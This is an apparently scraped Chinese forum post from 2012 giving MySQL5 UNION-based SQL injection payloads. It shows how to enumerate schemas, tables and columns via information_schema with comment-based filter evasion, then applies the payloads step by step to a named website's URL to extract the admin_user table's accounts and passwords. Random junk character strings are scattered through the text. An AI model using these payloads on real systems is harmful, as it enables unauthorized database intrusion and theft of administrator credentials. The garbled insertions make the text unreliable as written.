查库/ E! U. K* _" Q9 X/ F+ ^, D
8 R/ x: Z+ Z2 X, @id=-1 union select 1,..,SCHEMA_NAME,n from/**/information_schema.SCHEMATA limit 1,1/*7 R, Z2 a( w: @
2 W- |% Y' j2 w7 O( @查表
- h: Z# t2 c$ ^9 ?3 D4 R2 y
% |2 h* h4 _1 {0 R- Kid=-1/**/union/**/select/**/1,TABLE_NAME,N/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=库的HEX值/**/limit/**/1,1- _, E. q/ o6 M- a
& Z$ x4 p5 A. w2 i3 r9 w$ d: d9 F查段 s# m0 }2 w" z9 f* P) b( k
7 A4 J: \( S, x5 Vid=-1/**/union/**/select/**/1,COLUMN_NAME,N/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=表的HEX值/**/limit/**/1,1. j" B5 W6 s7 L) f& }' S
" S# n, v" m% n1 w; J" J2 m' R$ U
5 v& D; y6 ~& i0 w8 b6 xmysql5高级注入方法暴表
8 F x9 e9 x* S0 a* `+ W" B% s
5 H& n- e. a' Y例子如下:
/ r/ j$ l1 ~( ~. K$ B6 f1 q: T
% b/ n8 C/ J' X0 o# ?0 c1.爆表
f& H6 w0 o4 M1 j6 A! @http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/* (0x79645F7465616D6E6574为数据库名的16进制转换yd_teamnet)
2 H F7 b3 p# U1 Y5 f这样爆到第4个时出现了admin_user表。
/ e) h, \" ]: |. S+ o) e8 J& e5 E
2.暴字段; ]0 p+ C: Z" u1 Y
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,COLUMN_NAME,5/**/From/**/information_schema.COLUMNS/**/Where/**/TABLE_NAME=0x61646D696E5F75736572/**/And/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*& r$ f6 k" W3 A: g6 a7 ~9 l
7 j' S) w% J- R5 B: V M0 i1 O
7 E9 G8 l6 A) p: X2 ]3.爆密码9 k7 s6 q7 u0 T* Z) J1 e4 t
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,concat(0x7c,ID,0x7c,ACCOUNT,0x7c,PASSWORD,0x7c),5/**/From/**/admin_user/**/limit/**/0,1/*
! F$ C0 {+ {8 ^1 c* F; v8 h+ M0 ~$ T
" W1 ]. [& T) Z7 Z' J X
|
发表于 2012-9-13 16:29:37
收藏
支持
反对